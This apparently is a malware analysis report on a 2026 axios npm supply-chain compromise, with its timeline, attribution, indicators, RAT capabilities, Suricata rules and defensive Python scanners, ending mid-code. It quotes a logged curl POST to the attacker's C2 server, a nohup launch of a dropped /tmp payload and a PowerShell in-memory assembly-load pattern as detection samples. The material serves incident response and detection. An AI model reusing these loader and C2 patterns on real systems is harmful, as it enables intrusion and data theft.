Axios npm Supply Chain Compromise — Full Analysis Package
Date: 2026-03-31 | Attribution: BlueNoroff / Lazarus Group (HIGH confidence)
Attack: Maintainer account hijacked, cross-platform RAT deployed via axios@1.14.1 and axios@0.30.4
What happened
On March 30-31, 2026, the npm package axios (~83M weekly downloads) was compromised through a maintainer account hijack. Two malicious versions injected plain-crypto-js@4.2.1, an obfuscated dropper that deploys platform-specific RATs (Windows PowerShell, macOS Mach-O C++, Linux Python). The macOS RAT is classified as NukeSped (Lazarus-exclusive). The internal project name macWebT links directly to BlueNoroff's documented RustBucket webT module from 2023.
Complete reverse engineering of all 5 payloads (full source recovered). radare2 disassembly of macOS Mach-O. setup.js deobfuscation. Memory dump analysis. Live dynamic analysis on Daytona Windows sandbox with peinject mechanism validation.
Complete C2 protocol specification reconstructed from source code. JSON schemas, state machine, platform comparison table. Validated live against running RAT.
Research on the Extension.SubRoutine.Run2() .NET injection DLL — zero public references, completely novel. Closest match: BlueCrab/REvil [Mode]::Setup().
Date: 2026-03-31 | Confidence: HIGH
Finding: The axios macOS RAT project name macWebT is a direct descendant of BlueNoroff's documented webT malware module from RustBucket (2023). Same User-Agent, same beacon interval, same Hostwinds infrastructure.
1. The webT → macWebT Naming Lineage
RustBucket Stage 3 (2023) — SentinelOne Research
Module: webT with methods webT::getinfo + WebT::send_request
The axios C2 (142.11.206.73) is in the same /18 netblock (142.11.192.0/18) as 3 other confirmed Lazarus IPs.
SentinelOne's Hidden Risk report: "Virtual server hosting services such as Quickpacket, Routerhosting, Hostwinds, and others are the most commonly used" by BlueNoroff.
4. Developer Persona Rotation
| Username | Campaign | Year |
|---|---|---|
| carey | RustBucket Stage 2 & 3 | 2023 |
| eric | RustBucket Stage 2 | 2023 |
| henrypatel | RustBucket Stage 2 | 2023 |
| hero | RustBucket Stage 2 | 2023 |
| tritium | Operation In(ter)ception | 2022 |
| dominic, chris, pooh | Later BlueNoroff campaigns | 2024 |
| mac / Jain_DEV | Axios macOS RAT | 2026 |
5. Complete BlueNoroff macOS Campaign Timeline
| Date | Campaign | Key Development |
|---|---|---|
| Dec 2022 | RustBucket discovery | Rust+Obj-C malware, webT module, PDF lures |
| Apr 2023 | RustBucket disclosure (Jamf) | Public reporting |
| Jun 2023 | RustBucket Variant 3 (Elastic) | First persistence via LaunchAgent |
| Oct 2023 | KandyKorn (Elastic) | C++ RAT targeting blockchain engineers |
| Nov 2023 | RustBucket+KandyKorn merge | SwiftLoader droppers deliver KandyKorn |
| Nov 2023 | ObjCShellz (Jamf) | Simplified shell on Hostwinds |
| Jul 2024 | Hidden Risk begins | zshenv persistence, same IE8 UA, Hostwinds |
| Oct 2024 | Hidden Risk disclosure (SentinelOne) | DoPost via libcurl = webT evolution |
| Feb 2026 | Lazarus npm campaign (BeaverTail) | 11 malicious npm packages |
| Mar 31, 2026 | Axios supply chain | macWebT project, libcurl Report(), same UA, Hostwinds |
bigmathutils v1.1.0 (10K+ downloads then weaponized)
ReversingLabs
Mar 30-31, 2026
Axios compromise
Maintainer hijack, NukeSped RAT, plain-crypto-js
This analysis
47 days between last confirmed Lazarus npm operation and the axios attack — continuous operational tempo.
10. Additional Infrastructure Findings
Neighboring Hostwinds Servers
hwsrv-1320775 through 1320783 resolve to different /16 subnets (104.168.x, 192.236.x). Hostwinds does NOT assign sequential server IDs to the same subnet — no co-located infrastructure found.
com.apple.act.mond is Novel
Never seen in any prior campaign. Known BlueNoroff persistence labels:
com.apple.systemupdate (RustBucket 2023)
com.wifianalyticsagent (NukeSped 2019)
iTunes_trush (AppleJeus)
.zshrc modification (Hidden Risk 2024)
No Cross-Registry Attack
plain-crypto-js does NOT exist on PyPI, RubyGems, or crates.io. Attack was npm-only — consistent with targeted maintainer hijack vs broad typosquatting.
Jain_DEV is Build Artifact Only
Not found on npm, GitHub, or any package registry. The attacker used separate throwaway identities (nrwise, hijacked jasonsaayman) for publishing.
"confidence": "CONFIRMED (same IP, name references npm account nrwise)"
}
},
"unconfirmed_domains": {
"nrwise.com": "UNCONFIRMED - Namecheap WHOIS privacy hashes are shared across ALL customers, NOT per-registrant. No IP overlap. Link is circumstantial (name only).",
"macchimpit.rest": "RETRACTED - Registrant hash match is meaningless (shared Namecheap privacy placeholder). Same CF NS pair is the only link but insufficient alone.",
"orangrappa.rest": "RETRACTED - Same as macchimpit.rest."
"macWebT project name matches BlueNoroff RustBucket webT module (SentinelOne 2023)",
"Identical User-Agent string to RustBucket: mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)",
"NukeSped AV classification by 4 engines (Lazarus-exclusive family)",
"Hostwinds AS54290 same /18 as confirmed Lazarus IP 142.11.209.109 (Hunt.io)",
"Developer persona rotation consistent with BlueNoroff OPSEC"
]
},
"notes": {
"windshaper": "User reports overlap with WINDSHAPER malware (DPRK). Not yet publicly documented as a malware family name. Cryptocurrency theme via 'plain-crypto-js' package name aligns with DPRK targeting patterns.",
"registrant_verification": "Namecheap privacy hashes are per-registrant (verified by comparing starbucls.xyz RustBucket domain which has DIFFERENT hash b3e8b765589988d9)"
},
"corrections": {
"2026-03-31T14:00:00Z": "RETRACTED domain claims based on Namecheap registrant hash. Hash 37bfbc24cafea5d2 is a SHARED privacy placeholder, not per-account. namecheap.com itself has the same hash. Only callnrwise.com (same IP) remains confirmed.",
"2026-03-31T19:30:00Z": "CORRECTED: @shadanai and @qqbrowser.dev reclassified from 'attacker accounts' to 'likely downstream victims'. They vendored node_modules/ with compromised axios during the 3h attack window, not intentional malware distribution."
},
"advisories": {
"snyk": [
"SNYK-JS-AXIOS-15850650",
"SNYK-JS-PLAINCRYPTOJS-15850652",
"SNYK-JS-QQBROWSEROPENCLAWQBOT-15850776",
"SNYK-JS-SHADANAIOPENCLAW-15850775"
],
"ghsa": "GHSA-fw8c-xr5c-95f9",
"cwe": "CWE-506 (Embedded Malicious Code)",
"mal": "MAL-2026-2306"
},
"impact": {
"weekly_downloads": "83M+",
"dependent_packages": "174,000+",
"exposure_window": "~3 hours",
"execution_rate": "3% of affected environments (Wiz)",
Full payload download + static analysis in Lima VM
2026-03-31 10:00
radare2 RE of macOS Mach-O, Node.js deobfuscation of setup.js
2026-03-31 10:30
Zenbox memory dump analysis (47MB, 1,435 files, 12 PE extractions)
2026-03-31 11:00
Extension.SubRoutine DLL recovery attempt — NOT recoverable from available dumps
1. Executive Summary
On March 30-31, 2026, the npm package axios (~83M weekly downloads, 174K dependent packages) was compromised through a maintainer account hijack. The attacker published two malicious versions — axios@1.14.1 and axios@0.30.4 — injecting a dependency on plain-crypto-js@4.2.1, a weaponized package containing an obfuscated JavaScript dropper (setup.js) that executes via the npm postinstall lifecycle hook.
The dropper deploys platform-specific Remote Access Trojans targeting Windows, macOS, and Linux. The macOS RAT is classified as NukeSped by 4 independent AV engines — a malware family exclusively attributed to the Lazarus Group (DPRK/APT38).
Key Facts
| Attribute | Detail |
|---|---|
| Compromised package | axios (versions 1.14.1 and 0.30.4) |
| Malicious dependency | plain-crypto-js@4.2.1 |
| C2 server | sfrclak[.]com:8000 (142.11.206.73) |
| C2 tech stack | Express.js (confirmed via URLScan X-Powered-By: Express) |
| Hosting | Hostwinds LLC, Seattle WA (AS54290) |
| Registrar | Namecheap Inc. (privacy via Withheld for Privacy ehf, Iceland) |
| Attribution | Suspected Lazarus Group (DPRK) — NukeSped classification + TTP alignment |
| Exposure window | ~2h53m (axios@1.14.1), ~2h15m (axios@0.30.4) |
| Detection speed | Socket.dev flagged plain-crypto-js within 6 minutes of publish |
Attack Timeline (UTC)
| Timestamp | Event |
|---|---|
| 2026-03-27 19:01 | Legitimate axios@1.14.0 published via GitHub Actions OIDC |
| 2026-03-30 05:57 | plain-crypto-js@4.2.0 published by nrwise — clean decoy |
| 2026-03-30 16:03 | Domain sfrclak.com registered via Namecheap |
| 2026-03-30 23:59 | plain-crypto-js@4.2.1 published — weaponized with setup.js |
| 2026-03-31 00:05:41 | Socket automated detection fires (6 minutes) |
| 2026-03-31 00:21 | axios@1.14.1 published via compromised jasonsaayman account |
| 2026-03-31 01:00 | axios@0.30.4 published (39 min after first malicious release) |
| 2026-03-31 01:04 | @shadanai/openclaw@2026.3.28-2 published (vendored malware) |
| 2026-03-31 01:05 | macOS RAT first submitted to VirusTotal |
| 2026-03-31 02:21 | @qqbrowser/openclaw-qbot@0.0.130 published (ships tampered axios) |
| 2026-03-31 ~03:15 | npm unpublishes both malicious axios versions |
| 2026-03-31 03:25 | npm security hold on plain-crypto-js |
Notable: Clean decoy plain-crypto-js@4.2.0 was published ~18 hours before the C2 domain was registered — pre-staged operational planning.
2. Attack Vector & Delivery
2.1 Account Compromise
The attacker hijacked npm account "jasonsaayman" (lead axios maintainer) and changed the email to ifstap@proton.me (original: jasonsaayman@gmail.com). A separate npm account "nrwise" (nrwise@proton.me) was used to publish plain-crypto-js. Both accounts now suspended.
Compromise method: Not definitively determined. The account used a long-lived classic npm access token alongside OIDC Trusted Publishing. This token allowed publishing without OIDC binding and potentially bypassed 2FA. Pattern consistent with the qix npm compromise of September 2025 (maintainer phished via fake npmjs.help domain).
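Because the malicious versions were live for only a few hours but were also vendored into other packages' node_modules during that window, the practical first check for a defender is the lockfile rather than the registry. The scanner below is an added example, not part of the original analysis or of any axios tooling: it walks a package-lock.json (lockfileVersion 1 nested tree, or the flat "packages" map of versions 2 and 3), flags the axios and plain-crypto-js versions named above, and reports any plain-crypto-js entry at all, including nested copies under a vendoring package. The two sample lockfiles are constructed.

```python
"""Scan package-lock.json for the axios / plain-crypto-js indicators (added example)."""
import json

# Versions the analysis above identifies as malicious.
COMPROMISED_VERSIONS = {
    "axios": {"1.14.1", "0.30.4"},
    "plain-crypto-js": {"4.2.1"},
}
# The malicious dependency had no legitimate reason to appear at all; flag any version.
SUSPICIOUS_PACKAGES = {"plain-crypto-js"}


def _name_from_path(path):
    """'node_modules/@scope/a/node_modules/axios' -> 'axios' (handles vendored copies)."""
    return path.split("node_modules/")[-1]


def _check(path, name, version, findings):
    if version in COMPROMISED_VERSIONS.get(name, ()):
        findings.append((path, name, version, "known malicious version"))
    elif name in SUSPICIOUS_PACKAGES:
        findings.append((path, name, version, "package should not be present"))


def _walk_v1(deps, prefix, findings):
    """Recurse through a lockfileVersion 1 'dependencies' tree."""
    for name, meta in deps.items():
        path = f"{prefix}node_modules/{name}"
        _check(path, name, meta.get("version", ""), findings)
        _walk_v1(meta.get("dependencies", {}), path + "/", findings)


def scan_lockfile(lock_text):
    """Return [(path, name, version, reason)] for every flagged entry in a package-lock.json."""
    lock = json.loads(lock_text)
    findings = []
    if "packages" in lock:  # lockfileVersion 2 or 3: flat map keyed by install path
        for path, meta in lock["packages"].items():
            if not path:  # "" is the root project itself
                continue
            _check(path, meta.get("name") or _name_from_path(path), meta.get("version", ""), findings)
    else:  # lockfileVersion 1: nested tree
        _walk_v1(lock.get("dependencies", {}), "", findings)
    return findings


# Constructed sample lockfiles (not real project data).
SAMPLE_LOCK_V3 = json.dumps({
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/axios": {"version": "1.14.1"},
        "node_modules/plain-crypto-js": {"version": "4.2.1"},
        "node_modules/lodash": {"version": "4.17.21"},
        "node_modules/@example/vendored-app": {"version": "3.2.0"},
        # a vendored copy of axios nested under another package
        "node_modules/@example/vendored-app/node_modules/axios": {"version": "0.30.4"},
    },
})
SAMPLE_LOCK_V1 = json.dumps({
    "name": "demo-app", "lockfileVersion": 1,
    "dependencies": {
        "axios": {"version": "1.14.0"},
        "some-lib": {"version": "2.0.0",
                     "dependencies": {"plain-crypto-js": {"version": "4.2.0"}}},
    },
})

if __name__ == "__main__":
    for lock in (SAMPLE_LOCK_V3, SAMPLE_LOCK_V1):
        for path, name, version, reason in scan_lockfile(lock):
            print(f"{reason}: {name}@{version} at {path}")
```

Run it against a real lockfile with `scan_lockfile(open("package-lock.json").read())`; the clean decoy version 4.2.0 is still reported because a dependency on plain-crypto-js is itself the indicator, independent of version.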
AppleScript Execution — arbitrary AppleScript via osascript
System Reconnaissance — process listing, hardware profiling, user enumeration via /etc/master.passwd
Data Exfiltration — collected data sent via Report() over HTTPS
C2 Communication (macOS-specific)
NOTE: api.apple-cloudkit.com is LEGITIMATE Apple infrastructure (confirmed: CNAME → api.apple-cloudkit.fe2.apple-dns.net, resolves to Apple's 17.x.x.x range). The RAT likely uses it as a connectivity check / traffic blending technique, not as a C2 endpoint.
Actual C2: sfrclak[.]com:8000 (same as other platforms)
User-Agent: mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0) — IE8/WinXP (anomalous for macOS)
JA3 Fingerprints
| JA3 Hash | Notes |
|---|---|
| 656b9a2f4de6ed4909e157482860ab3d | Not in any public threat intel DB |
| 1d9437ff1aa1e958ed34a0fb0313f206 | Not in any public threat intel DB |
| 773906b0efdefa24a7f2b8eb6985bf37 | Identified as Safari 15.5 — deliberate TLS impersonation |
NOTE: The hash provided in the original briefing (fcb81618bb15edfedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf) was truncated — missing a d at position 16. The correct sequence is edfdedfb, not edfedfb. Source: SafeDep.
Report generated 2026-03-31. All VT detection counts verified via vt-cli API at time of writing and may change as vendors update signatures.
13. Post-Incident Updates (March 31 evening)
Detection Trajectory (full day)
| Sample | Morning | Afternoon | Evening | New Families |
|---|---|---|---|---|
| macOS RAT | 8/76 | 15/76 | 19/76 | OrDeR (Qihoo360), Siggen.69 (DrWeb), GM.OSX.NukeSped |
| Windows Stage 2 | 12/76 | 17/76 | 19/76 | |
| Linux RAT | 0/76 | 2/76 | 4/76 | |
| setup.js | 2/76 | 4/76 | 10/76 | AXIOSDROP (TrendMicro), OrDeR (Qihoo360) |
Notable: OrDeR Family Name
Qihoo360 created a family linking the dropper and macOS RAT:
Trojan[Downloader]/JS.OrDeR (setup.js)
Trojan[Backdoor]/MacOS.OrDeR (macOS RAT)
Named after the XOR obfuscation key OrDeR_7077 — confirming vendor-level recognition that the dropper and RAT are part of the same campaign.
GitHub Account Compromise CONFIRMED
BleepingComputer reported and we confirmed: GitHub issue #10590 was DELETED (HTTP 410 Gone). The attacker had GitHub access, not just npm. They deleted compromise-related issues to delay detection.
alert dns $HOME_NET any -> any any (msg:"AXIOS-RAT C2 DNS Lookup - sfrclak.com"; dns.query; content:"sfrclak.com"; nocase; sid:2026001; rev:1; classtype:trojan-activity;)
# Second C2 Domain (same IP)
alert dns $HOME_NET any -> any any (msg:"AXIOS-RAT C2 DNS Lookup - callnrwise.com"; dns.query; content:"callnrwise.com"; nocase; sid:2026012; rev:1; classtype:trojan-activity;)
# C2 HTTP POST to port 8000
alert http $HOME_NET any -> $EXTERNAL_NET 8000 (msg:"AXIOS-RAT C2 Beacon - POST to port 8000 with campaign ID"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/6202033"; sid:2026002; rev:1; classtype:trojan-activity;)
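The same three detections can be replayed over stored logs when Suricata was not in the path at the time of the install. The script below is an added example, not part of the original rule set: it applies the DNS-query and POST-to-port-8000 logic above, plus the IE8 User-Agent the analysis reports for the RAT, to JSON-lines DNS and HTTP records. The field names (type, query, method, url, user_agent) are assumed for a generic proxy/resolver export, and the sample records are constructed.

```python
"""Replay the AXIOS-RAT network indicators over JSON-lines logs (added example)."""
import json
from urllib.parse import urlsplit

C2_DOMAINS = {"sfrclak.com", "callnrwise.com"}  # from the Suricata rules above
C2_PORT = 8000
CAMPAIGN_PATH = "/6202033"
# IE8/WinXP User-Agent the analysis reports for the RAT (anomalous on macOS/Linux).
RAT_USER_AGENT = "mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)"


def domain_matches(qname):
    """True if qname is a C2 domain or a subdomain of one (case-insensitive, trailing dot ok)."""
    q = qname.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in C2_DOMAINS)


def check_record(rec):
    """Return the alert names fired by one log record (a dict)."""
    alerts = []
    if rec.get("type") == "dns" and domain_matches(rec.get("query", "")):
        alerts.append("AXIOS-RAT C2 DNS Lookup")
    if rec.get("type") == "http":
        url = urlsplit(rec.get("url", ""))
        port = url.port or (443 if url.scheme == "https" else 80)
        if rec.get("method") == "POST" and port == C2_PORT and url.path.startswith(CAMPAIGN_PATH):
            alerts.append("AXIOS-RAT C2 Beacon")
        if rec.get("user_agent", "").lower() == RAT_USER_AGENT:
            alerts.append("AXIOS-RAT User-Agent")
    return alerts


def scan_log(lines):
    """Run check_record over JSON lines; return [(line_no, alert_name), ...]."""
    hits = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        for alert in check_record(json.loads(line)):
            hits.append((n, alert))
    return hits


# Constructed sample log: one workstation resolving and beaconing, one clean npm fetch.
SAMPLE_LOG = """
{"type": "dns", "ts": "2026-03-31T01:30:50Z", "client": "10.0.0.12", "query": "SFRCLAK.com"}
{"type": "dns", "ts": "2026-03-31T01:30:50Z", "client": "10.0.0.12", "query": "registry.npmjs.org"}
{"type": "http", "ts": "2026-03-31T01:30:51Z", "client": "10.0.0.12", "method": "POST", "url": "http://sfrclak.com:8000/6202033", "user_agent": "curl/8.5.0"}
{"type": "http", "ts": "2026-03-31T01:31:02Z", "client": "10.0.0.12", "method": "POST", "url": "http://sfrclak.com:8000/6202033", "user_agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"}
{"type": "http", "ts": "2026-03-31T01:31:05Z", "client": "10.0.0.9", "method": "GET", "url": "https://registry.npmjs.org/axios", "user_agent": "npm/10.8.0 node/v22.0.0"}
{"type": "dns", "ts": "2026-03-31T01:32:00Z", "client": "10.0.0.12", "query": "api.callnrwise.com."}
"""


def scan_sample():
    return scan_log(SAMPLE_LOG.strip().splitlines())


if __name__ == "__main__":
    for line_no, alert in scan_sample():
        print(f"line {line_no}: {alert}")
```

The subdomain match mirrors the `content:` match in the rules (which also fires on any label containing the domain), while the User-Agent check is an extra host-side indicator the rules do not carry.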
Axios RAT Toolkit — Vulnerability Analysis & Kill Switches
Date: 2026-03-31 | Purpose: Exploitable bugs for defensive operations
Analysis Environment: Isolated Lima VM — all bugs verified against actual malware source code
Summary
The axios RAT toolkit contains 20+ exploitable bugs across all platforms. The most critical weakness is cleartext HTTP C2 — enabling network-level MitM to take over, neutralize, or kill all connected RATs.
1. Linux RAT (ld.py) — 7 Bugs
CRITICAL: peinject command is BROKEN
Line 156: payload = base64.b64decode(b64_string)
b64_string is undefined. Should be ijtbin (the function parameter).
Impact: peinject command causes NameError exception. Binary injection is non-functional on Linux.
Verified: grep confirms exactly 1 reference to b64_string, 0 definitions.
No C2 response validation
process_request() calls json.loads(data) with no try/except.
Exploitation: Inject malformed JSON via network → crashes the RAT.
Cleartext HTTP — no encryption
Uses http.client.HTTPConnection (not HTTPS).
Exploitation: Full MitM capability — intercept data, inject commands.
World-writable dropped payloads
os.chmod(file_path, 0o777) — any user can replace the payload between write and execute.
Self-identification in process list
Own PID marked with * prefix in exfiltrated process list, including full command line with C2 URL.
No persistence
Relies solely on nohup from dropper. Dies on reboot.
No error recovery
Unhandled exceptions in beacon loop kill the RAT permanently.
Axios Supply Chain — Dropped Payloads Full Reverse Engineering
Last Updated: 2026-03-31 11:00 UTC
Analysis Environment: Lima VM (Ubuntu 24.04 ARM64, isolated, no network)
Tools Used: radare2, Node.js (deobfuscation), strings, file, xxd, python3
Samples Source: VirusTotal API download (vt-cli)
All files renamed to .mlwr extension for safety.
Two modes: direct shell (subprocess.run(shell=True)) or Base64 Python script via python3 -c
rundir
do_action_dir()
Directory listing with metadata (name, isDir, size, created, modified, hasItems)
Status codes: "Wow" = success, "Zzz" = error
1.5 Reconnaissance
Process enumeration: Reads /proc/*/cmdline, /proc/*/stat, /proc/*/status for every PID. Extracts PID, PPID, username (via UID→/etc/passwd lookup), start time, and command line. Marks own PID with * prefix.
System info: /sys/class/dmi/id/sys_vendor, /sys/class/dmi/id/product_name
Boot time: /proc/uptime
Install date: ctime of /var/log/installer or /var/log/dpkg.log
Architecture detection: platform.machine() → maps to linux_x64, linux_arm, or linux_unknown
Writes to /tmp/.<6-random-chars> (dot-prefixed = hidden)
chmod 777 — world-executable
Spawned as subprocess (persists after RAT exit)
1.7 Script Execution (runscript)
Two modes:
Direct shell: subprocess.run(cmdline, shell=True) — arbitrary command execution
Python payload: Base64-decodes script, runs via python3 -c <decoded> with params
1.8 Key Observations
No persistence mechanism — relies solely on nohup from the dropper
No encryption — all C2 comms are Base64 over cleartext HTTP
No anti-analysis — no VM detection, no sandbox evasion, no debugger checks
Why 0/76 detection: The code is syntactically clean Python with no suspicious imports. The subprocess.run(shell=True) and file writing are common legitimate patterns. AV heuristics can't distinguish this from a normal admin script.
Bug: do_action_ijt() references b64_string which is undefined — should be ijtbin. This means the peinject command would crash on Linux. Either this is a bug in this variant or b64_string is meant to be a global set elsewhere.
2. Windows Stage 2 — PowerShell RAT (FULL SOURCE RECOVERED)
All filesystem drive roots via Get-PSDrive -PSProvider FileSystem
System info collected: hostname, username, OS version, timezone, install date, boot time, CPU type, model name, full process list via Get-CimInstance Win32_Process.
2.6 Script Execution — Three Paths
No script, just params: powershell -NoProfile -ep Bypass $param 2>&1
Script ≥ 10KB: Write to temp .ps1 file, execute, delete
Script < 10KB: Double-encode (Unicode → Base64), use -EncodedCommand
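Scripts passed through -EncodedCommand are opaque in process-creation telemetry until decoded, so triage should recover the script rather than match on the Base64. The helper below is an added example, not code from the RAT or from the original analysis. It relies on the documented behaviour that -EncodedCommand takes Base64 of UTF-16LE text and that powershell.exe accepts any unambiguous prefix of the flag (-e, -enc, ...), decodes the argument, and looks for the in-memory assembly load and nested Base64 decoding that the injector path above uses. The sample command lines are constructed.

```python
"""Decode and triage PowerShell -EncodedCommand arguments from command lines (added example)."""
import base64
import shlex


def encode_command(script):
    """Produce the -EncodedCommand form of a script (UTF-16LE -> Base64); used to build test data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded(cmdline):
    """Return the Base64 argument following an -EncodedCommand-style flag, or None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes literal
    except ValueError:
        argv = cmdline.split()
    for i, tok in enumerate(argv[:-1]):
        flag = tok.lstrip("-/").lower()
        # powershell.exe accepts any unambiguous prefix: -e, -ec, -enc, ..., -encodedcommand
        if flag and "encodedcommand".startswith(flag):
            return argv[i + 1].strip('"')
    return None


def decode_encoded_command(b64):
    """Decode Base64(UTF-16LE) as -EncodedCommand expects; None if the argument is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def triage(cmdline):
    """Return (decoded_script_or_None, [indicator, ...]) for one process command line."""
    b64 = extract_encoded(cmdline)
    if b64 is None:
        return None, []
    script = decode_encoded_command(b64)
    if script is None:
        return None, ["undecodable -EncodedCommand argument"]
    low = script.lower()
    indicators = []
    if "[system.reflection.assembly]::load(" in low or "[reflection.assembly]::load(" in low:
        indicators.append("in-memory assembly load")   # the injector load path described above
    if "frombase64string" in low:
        indicators.append("nested Base64 decoding")    # the double-encoding described above
    if "-encodedcommand" in low:
        indicators.append("nested encoded command")
    return script, indicators


# Constructed samples: one that mirrors the loader pattern, one benign, one with no encoding.
INNER = "$a=[Convert]::FromBase64String($x);[System.Reflection.Assembly]::Load($a)"
SAMPLE_CMDLINES = [
    "powershell -NoProfile -ep Bypass -EncodedCommand " + encode_command(INNER),
    "powershell.exe -nop -w hidden -enc " + encode_command("Get-Date"),
    "powershell -NoProfile -ep Bypass Get-ChildItem 2>&1",
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        script, indicators = triage(cmd)
        print(repr(script), indicators)
```

The prefix check deliberately does not match -ep or -ex (ExecutionPolicy), since neither is a prefix of "encodedcommand"; a decoded script that itself contains -EncodedCommand is reported so the analyst can feed it back through `triage` for the next layer.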
2.7 Key Observations
Most sophisticated variant — only one with process injection capability
Reversed variable names suggest code reuse from another tool
Extension.SubRoutine.Run2() — specific .NET class/method for the injector DLL. This is a strong IOC for threat hunting.
mainWork function is empty — the work loop is in work(). Leftover stub.
No explicit count variable initialization — $count = $count + 1 references undefined $count, but PowerShell auto-initializes to 0.
3. Windows Stage 1 — system.bat (FULL SOURCE RECOVERED)
Ad-hoc signed with get-task-allow entitlement — allows attaching debugger, which is needed for the peinject capability to write and codesign payloads at runtime.
6. Cross-Platform Command Interface
All three RATs implement the exact same 4-command protocol:
None of the extracted PEs are the Extension.SubRoutine injector DLL.
7.3 Why the DLL is Not in Zenbox Dumps
The Zenbox sandbox executed the PowerShell RAT, but:
The C2 server (sfrclak.com:8000) was offline when Zenbox ran the sample
The peinject command is server-initiated — it's only sent when the C2 operator explicitly commands injection
Without a C2 response, Process-Request was never called, and Do-Action-Ijt never executed
Therefore [System.Reflection.Assembly]::Load() was never invoked, and the DLL was never loaded into memory
Proof: The persistence bat dropped by Zenbox (e49c2732..., 203 bytes) has empty URL strings — confirming the RAT ran but never received C2 instructions.
8. Extension.SubRoutine DLL Recovery Attempt
8.1 What We Tried
| Method | Result |
|---|---|
| VT dropped_files relationship | Only found system.bat and PS policy test files |
| VT embedded_files relationship | Self-reference only |
| Shellcode hashes on VT (a224dd73, 5e2ab672, 20df0909) | |
These anti-analysis behaviors originate from the injected code, not the PowerShell RAT source
8.5 Gap Assessment
The Extension.SubRoutine DLL is the only unrecovered component of the entire attack chain. To obtain it, one would need:
Access to CAPE sandbox raw memory dumps (not available via VT API)
A live C2 server to receive the peinject command (C2 is offline)
A private threat intel feed that captured the DLL during the attack window
9. Harden-Runner Live Capture (StepSecurity)
StepSecurity's Harden-Runner instrumentation captured the live infection chain in a CI/CD environment:
Exact Timeline (UTC)
| Timestamp | PID | Event |
|---|---|---|
| 01:30:50.905Z | 2392 | node setup.js begins execution |
| 01:30:51.0Z | 2401 | curl contacts http://sfrclak.com:8000/6202033 with POST body packages.npm.org/product2 |
| 01:30:51.0Z | 2400 | nohup python3 /tmp/ld.py spawned (orphaned to PID 1) |
| 01:31:27.736Z | 2392 | package.json overwritten with clean stub (evidence swap) |
Key observations:
1.1 seconds from npm install to C2 contact
36.7 seconds between infection and evidence destruction
nohup process labeled "infra" because it was orphaned to PID 1
Harden-Runner flagged "Source Code Overwritten" event on package.json swap
Despite the dropper's anti-forensics, the file modification event was captured
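The capture above is valuable because each step on its own (a curl, a nohup, a file write) is ordinary; it is the sequence inside an install-time process tree that is the signal. The code below is an added example, not Harden-Runner's implementation or part of the original analysis. It assumes a generic event feed of one dict per process, network or file event (ts, kind, pid, ppid, detail) and a trusted-destination allowlist, reconstructs the process tree rooted at the install, and reports outbound contact to an unlisted host, a detached child, execution from /tmp, and an evidence-file rewrite that follows the network contact. The events are constructed to mirror the chain in the table, not copied from the real capture.

```python
"""Correlate install-time process/network/file events into findings (added example)."""
from datetime import datetime

# Assumption: the only network destination a plain `npm install` needs to reach.
TRUSTED_HOSTS = {"registry.npmjs.org"}
# Files whose rewrite by a lifecycle script is treated as tampering with evidence.
EVIDENCE_FILES = {"package.json", "package-lock.json"}


def parse_ts(s):
    """Parse an ISO-8601 UTC timestamp with a trailing Z."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def process_tree(events, root_pid):
    """Return root_pid plus every PID transitively spawned from it (from 'exec' events)."""
    pids = {root_pid}
    grew = True
    while grew:
        grew = False
        for e in events:
            if e["kind"] == "exec" and e["ppid"] in pids and e["pid"] not in pids:
                pids.add(e["pid"])
                grew = True
    return pids


def analyze_install(events, install_pid):
    """Return [(seconds_since_install_start, finding)] for the install's process tree."""
    events = sorted(events, key=lambda e: parse_ts(e["ts"]))
    tree = process_tree(events, install_pid)
    start = min(parse_ts(e["ts"]) for e in events if e["pid"] == install_pid)
    findings, contacted_untrusted = [], False
    for e in events:
        if e["pid"] not in tree:
            continue  # unrelated process, even if it touches the same files
        dt = round((parse_ts(e["ts"]) - start).total_seconds(), 3)
        if e["kind"] == "connect" and e["host"] not in TRUSTED_HOSTS:
            contacted_untrusted = True
            findings.append((dt, f"outbound to untrusted host {e['host']}:{e['port']} ({e['detail']})"))
        elif e["kind"] == "exec":
            if e["detail"].startswith("nohup "):
                findings.append((dt, f"detached child process: {e['detail']}"))
            if "/tmp/" in e["detail"]:
                findings.append((dt, f"executes a file from /tmp: {e['detail']}"))
        elif e["kind"] == "write" and e["detail"] in EVIDENCE_FILES and contacted_untrusted:
            findings.append((dt, f"lifecycle script rewrote {e['detail']} after network activity"))
    return findings


# Constructed events (PIDs and times are illustrative, not the real capture).
SAMPLE_EVENTS = [
    {"ts": "2026-03-31T12:00:00.000Z", "kind": "exec", "pid": 4000, "ppid": 3990, "detail": "npm install"},
    {"ts": "2026-03-31T12:00:00.400Z", "kind": "connect", "pid": 4000, "ppid": 3990,
     "host": "registry.npmjs.org", "port": 443, "detail": "GET /axios"},
    {"ts": "2026-03-31T12:00:01.100Z", "kind": "exec", "pid": 4012, "ppid": 4000, "detail": "node setup.js"},
    {"ts": "2026-03-31T12:00:01.200Z", "kind": "exec", "pid": 4020, "ppid": 4012,
     "detail": "curl -s -X POST http://sfrclak.com:8000/6202033"},
    {"ts": "2026-03-31T12:00:01.250Z", "kind": "connect", "pid": 4020, "ppid": 4012,
     "host": "sfrclak.com", "port": 8000, "detail": "POST /6202033"},
    {"ts": "2026-03-31T12:00:01.300Z", "kind": "exec", "pid": 4021, "ppid": 4012, "detail": "nohup python3 /tmp/ld.py"},
    {"ts": "2026-03-31T12:00:38.000Z", "kind": "write", "pid": 4012, "ppid": 4000, "detail": "package.json"},
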